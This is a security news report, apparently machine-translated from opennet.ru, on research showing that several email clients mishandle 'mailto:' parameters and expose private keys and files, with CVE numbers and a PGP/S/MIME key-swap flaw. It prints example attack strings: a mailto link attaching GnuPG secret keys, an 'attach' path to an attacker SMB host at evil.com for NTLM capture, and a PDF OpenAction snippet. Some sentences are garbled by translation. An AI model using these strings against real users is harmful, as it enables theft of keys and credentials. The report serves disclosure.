Researchers from the Ruhr University in Bochum (Germany) () behavior of mail clients when handling "mailto:" links with advanced options. Five of the twenty email clients examined were vulnerable to an attack that manipulated resource substitution using the "attach" parameter. Another six email clients were affected by a PGP and S/MIME key swap attack, and three clients were vulnerable to an encrypted message content extraction attack.
Links «» are used to automate the opening of the mail client in order to write a letter to the addressee specified in the link. In addition to the address, as part of the link, you can specify additional parameters, such as the subject of the letter and the template for typical content. The proposed attack manipulates the "attach" parameter, which allows you to attach an attachment to the created letter.
Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail email clients were vulnerable to a trivial attack that allowed automatic attachment of any local file, specified through a link like "mailto:?attach=path_to_file". The file is attached without a warning, so without special attention the user may not notice that the email will be sent with an attachment attached.
For example, using a link like "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" you can substitute private keys from GnuPG into the email. You can also send the contents of crypto wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any files available to the user. Moreover, Thunderbird allows you to attach groups of files by mask using constructions like "attach=/tmp/*.txt".
In addition to local files, some mail clients process links to network storages and paths in the IMAP server. In particular, IBM Notes allows you to transfer a file from a network directory when processing links like "attach=\\evil.com\dummyfile", as well as intercept NTLM authentication parameters by sending a link to an SMB server controlled by the attacker (the request will be sent with the current authentication parameters user).
Thunderbird successfully handles requests like "attach=imap:///fetch>UID>/INBOX>1/" to attach content from folders on the IMAP server. At the same time, letters retrieved from IMAP, encrypted via OpenPGP and S/MIME, are automatically decrypted by the mail client before being sent. Thunderbird developers were about the issue in February and in the issue the problem has already been fixed (Thunderbird 52, 60 and 68 branches remain vulnerable).
Old versions of Thunderbird were also vulnerable to two other attacks on PGP and S/MIME proposed by the researchers. In particular, Thunderbird, as well as OutLook, PostBox, eM Client, MailMate, and R2Mail2, were subject to a key swap attack, caused by the fact that the mail client automatically imports and installs new certificates transmitted in S / MIME messages, which allows the attacker to organize substitution of public keys already stored by the user.
The second attack, which Thunderbird, PostBox and MailMate are subject to, manipulates the features of the mechanism for autosaving draft messages and allows using the mailto parameters to initiate the decryption of encrypted messages or the addition of a digital signature for arbitrary messages, followed by transferring the result to the attacker's IMAP server. The ciphertext in this attack is transmitted through the "body" parameter, and the "meta refresh" tag is used to initiate a call to the attacker's IMAP server. For example: ' '
Specially designed PDF documents can be used to automatically process "mailto:" links without user interaction - the OpenAction action in PDF allows you to automatically run the mailto handler when the document is opened:
%PDF-1.5
1 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 obj
<< /Type /Action /S /URI/URI (mailto:?body=ββBEGIN PGP MESSAGEββ[β¦])>>
endobj
Source: opennet.ru